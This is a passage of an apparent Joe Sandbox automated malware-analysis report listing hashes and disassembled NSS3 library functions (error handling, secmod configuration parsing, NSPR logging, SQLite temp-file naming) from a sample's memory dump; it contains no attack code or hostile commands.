                                                                                                                                                                                                                          • Opcode ID: 7d32483ec72bcb56158b70ed138bc8abc1cccaf968a23ae8e5e98d77eb964643
                                                                                                                                                                                                                          • Instruction ID: bd17d308d64e1fe294fac60b6965b5cc5a60c333e6912e86e4f2570573219a91
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d32483ec72bcb56158b70ed138bc8abc1cccaf968a23ae8e5e98d77eb964643
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54229F307491654FE714CB658462EBA7BF2DF4639AB2C6598C9E19FF42C22DEC42C780
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: `
                                                                                                                                                                                                                          • API String ID: 0-2679148245
                                                                                                                                                                                                                          • Opcode ID: 63d8633aa3f0d705b2d0fc2c2041d3ecd02ce23ed30f15c510940298f9088538
                                                                                                                                                                                                                          • Instruction ID: b035e4fbc83b70ba6a3e93836929ead1bbcacc83f082a1469818d63af81fc6a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63d8633aa3f0d705b2d0fc2c2041d3ecd02ce23ed30f15c510940298f9088538
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB926F74E002498FDB05DF58C890BAEB7B2FF88308F68416AD415ABB91D735EC56CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: htonl
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 2009864989-4108050209
                                                                                                                                                                                                                          • Opcode ID: febb16d6851d71d2a85959a04d55bc899c68e0da9d3be6e651c0407e470bdcf7
                                                                                                                                                                                                                          • Instruction ID: c79d42dea9a6150444622a4377f15423e0aee05e6fa30d5ca8b3a659235a88ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: febb16d6851d71d2a85959a04d55bc899c68e0da9d3be6e651c0407e470bdcf7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F514B33F490798ADB95457C88603FFFBB19F92318F184B29C5B1A7AC0C23545478BA2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49F019
                                                                                                                                                                                                                          • PK11_GenerateRandom.NSS3(?,00000000), ref: 6C49F0F9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorGenerateK11_Random
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3009229198-0
                                                                                                                                                                                                                          • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                          • Instruction ID: 809931b612ec586eea2ccb5530e3f81d630c9c8a1c5f9de83fbd285a8c14a958
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F91A371E012268BDB14CF68C891EAEBBF1FF85324F14462DE56697BC0D730A905CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C4E7929), ref: 6C4C2FAC
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C4E7929), ref: 6C4C2FE0
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Error
• String ID:
• API String ID: 2619118453-0
APIs
• PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C4CEE3D
Similarity
• API ID: Alloc_ArenaUtil
• String ID:
• API String ID: 2062749931-0
APIs
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C3F6013
Similarity
• API ID: strcmp
• String ID:
• API String ID: 1004003707-0
APIs
  • Part of subcall function 6C585B90: PR_Lock.NSS3(00010000,?,00000000,?,6C46DF9B), ref: 6C585B9E
  • Part of subcall function 6C585B90: PR_Unlock.NSS3 ref: 6C585BEA
• memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C585E23,6C46E154), ref: 6C585EBF
Similarity
• API ID: LockUnlockmemset
• String ID:
• API String ID: 1725470033-0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3ab0e84a488cee959b35fcaef245c91779c5305976c1e59583ff95b8ddef9bd4
                                                                                                                                                                                                                          • Instruction ID: 8d751254f5ad44682fe689a5ba1be565b54bea5321856b842014a88d76f5698e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ab0e84a488cee959b35fcaef245c91779c5305976c1e59583ff95b8ddef9bd4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42119D72A002158BD708CF26D888F5AB3B5BF42319F05426AD8158FF56D775E886C7C5
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5cda95d6ea283ee4c9e137fe1ed44031aa8ab0ec70079be82106298fc116dd0f
• Instruction ID: d25f0e901baf5ff052fb3f2ac6c73b6854e2bffe186b072f740d0dad83214ea4
• Opcode Fuzzy Hash: 5cda95d6ea283ee4c9e137fe1ed44031aa8ab0ec70079be82106298fc116dd0f
• Instruction Fuzzy Hash: 0C11BF75604345CFCB00DF28C88466AB7B1FF95368F24C46AD8198B701DB71E8068BA1
Similarity
• API ID: CriticalEnterSectionUnlockValue$Error
• String ID:
• API String ID: 2275178025-0
• Opcode ID: da28c0726b2ccbccd98010155c0125c32c9e807d7d43393f1c044887029a7ef5
• Instruction ID: c891e00470e6123313c328551daa3705a8441217cb560e16859f234145f4028b
• Opcode Fuzzy Hash: da28c0726b2ccbccd98010155c0125c32c9e807d7d43393f1c044887029a7ef5
• Instruction Fuzzy Hash: C0F05E70A047998BCB10DF29C95159AB7F4EF49254F129619EC8AAB301EB70BAC4C7D1
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
• Instruction ID: 66205555311cee1b0cfca9708c5c25835345e99bc65d725c80bf8e87d57c4cfc
• Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
• Instruction Fuzzy Hash: C2E06D3A202054A7DF148E09C850AA97359DFD1719FB4C47ACC5A9BA01D633F8078B81
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ce921e347125e3643dbba53842544590a282e1556149b4fb4ef37e8064b9634a
• Instruction ID: 125497e14dffb1c6e42affd9423d06053cedafd3d1ebd8773e18b965bd28bf74
• Opcode Fuzzy Hash: ce921e347125e3643dbba53842544590a282e1556149b4fb4ef37e8064b9634a
• Instruction Fuzzy Hash: 10C04838244708CFC704DB08E8899A43BA8AB096107054094EA028B721EB21F840CA88
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 25f1b04af2d414bc709eb0aa962eb82f9c46809ed6268de7c23cbda30ddf6cb0
• Instruction ID: 47104a29f38758b626e9fd1b87f1f88c6e7dc0f92f2b434e0ef660784f2bd3ff
• Opcode Fuzzy Hash: 25f1b04af2d414bc709eb0aa962eb82f9c46809ed6268de7c23cbda30ddf6cb0
• Instruction Fuzzy Hash:
APIs
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C4D5E08
• NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5E3F
• PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C4D5E5C
• free.MOZGLUE(00000000), ref: 6C4D5E7E
• free.MOZGLUE(00000000), ref: 6C4D5E97
• PORT_Strdup_Util.NSS3(secmod.db), ref: 6C4D5EA5
• _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C4D5EBB
• NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5ECB
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C4D5EF0
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5F12
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5F35
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C4D5F5B
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5F82
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C4D5FA3
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C4D5FB7
                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C4D5FC4
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5FDB
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D5FE9
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5FFE
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D600C
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D6027
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C4D605A
                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C5AAAF9,00000000), ref: 6C4D606A
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D607C
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D609A
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D60B2
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D60CE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                          • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                          • API String ID: 1427204090-154007103
                                                                                                                                                                                                                          • Opcode ID: 3ce9627da797c287500cb1c4c359e89076e15484484d005fff55d1a31af77e3d
                                                                                                                                                                                                                          • Instruction ID: d7d0e43d949374730e3df7721b3848e3fdf1a0f9ee5eec15076dd9646009c8f8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ce9627da797c287500cb1c4c359e89076e15484484d005fff55d1a31af77e3d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8391F5F09042055BEB01FF659C95F9E3BA4DF06289F0A0468EC559BB42EB31F905C7A2
                                                                                                                                                                                                                          APIs
• PR_NewLock.NSS3 ref: 6C461DA3
  • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
• PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C461DB2
  • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
  • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
  • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
  • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C461DD8
• _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C461E4F
• _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C461EA4
• _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C461ECD
• _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C461EEF
• _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C461F17
• _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C461F34
• PR_SetLogBuffering.NSS3(00004000), ref: 6C461F61
• PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C461F6E
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C461F83
• PR_SetLogFile.NSS3(00000000), ref: 6C461FA2
• PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C461FB8
• OutputDebugStringA.KERNEL32(00000000), ref: 6C461FCB
• free.MOZGLUE(00000000), ref: 6C461FD2
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
• String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
• API String ID: 2013311973-4000297177
• Opcode ID: 90aab3074630ecaea955167674c192dec8ecc098b701702f8dbaca9c808d914c
• Instruction ID: 9eac069976ad8792fbc366bb460cb33eefb76ab86b586f47e734d0bd0bf36c7e
• Opcode Fuzzy Hash: 90aab3074630ecaea955167674c192dec8ecc098b701702f8dbaca9c808d914c
• Instruction Fuzzy Hash: 22517DB1E002599BDF00DBE6CC44F9E77B8AF05309F080529E816EBB49E771E918CB95
APIs
  • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
  • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
• memset.VCRUNTIME140(00000000,00000000,?,?,6C40BE66), ref: 6C546E81
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C40BE66), ref: 6C546E98
• sqlite3_snprintf.NSS3(?,00000000,6C5AAAF9,?,?,?,?,?,?,6C40BE66), ref: 6C546EC9
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C40BE66), ref: 6C546ED2
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C40BE66), ref: 6C546EF8
• sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F1F
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F28
• sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F3D
• memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C40BE66), ref: 6C546FA6
• sqlite3_snprintf.NSS3(?,00000000,6C5AAAF9,00000000,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FDB
• sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FE4
• sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FEF
• sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C40BE66), ref: 6C547014
• sqlite3_free.NSS3(00000000,?,?,?,?,6C40BE66), ref: 6C54701D
• sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C40BE66), ref: 6C547030
• sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C40BE66), ref: 6C54705B
• sqlite3_free.NSS3(00000000,?,?,?,?,?,6C40BE66), ref: 6C547079
• sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C40BE66), ref: 6C547097
• sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C5470A0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                                                          • String ID: PXl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                          • API String ID: 593473924-1839926694
                                                                                                                                                                                                                          • Opcode ID: bf5f1bfb6da3c2e80b5a60b0ed525ab40d75b67ac1899ec27505fc0c67adb518
                                                                                                                                                                                                                          • Instruction ID: 1f6d9dd8d4a14d9bd13f1e76fdae3e36860dc56447b1169382f773de1766e511
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf5f1bfb6da3c2e80b5a60b0ed525ab40d75b67ac1899ec27505fc0c67adb518
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83518BB1A013116BE7109B309C51FBF36668F92358F148938E81596BC2FF25A91EC6D3
APIs
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000,00000000,00000001), ref: 6C4D5009
• PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4D5049
• PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D505D
• PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C4D5071
• PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5089
• PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D50A1
• NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C4D50B2
• free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2), ref: 6C4D50CB
• NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D50D9
• free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4D50F5
• NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5103
• free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D511D
• NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D512B
• free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5145
• NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5153
• free.MOZGLUE(?), ref: 6C4D516D
• NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D517B
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D5195
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
• String ID: config=$library=$name=$nss=$parameters=
• API String ID: 391827415-203331871
• Opcode ID: 1b27fcad2449a757ccef673a2135b6e669f78c3b9df840e15a4befa3bb81eeab
• Instruction ID: 8d755990a2ee1e0775b61e8b42e9058d8f9c7937047295ca205803efd5059ae6
• Opcode Fuzzy Hash: 1b27fcad2449a757ccef673a2135b6e669f78c3b9df840e15a4befa3bb81eeab
• Instruction Fuzzy Hash: 365140F5A01116ABEB01EF249C51EAE37B8DF06249F150024EC59E7741EB25F915C7F2
APIs
• PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C50
• free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C5B
• PR_smprintf.NSS3(6C5AAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C76
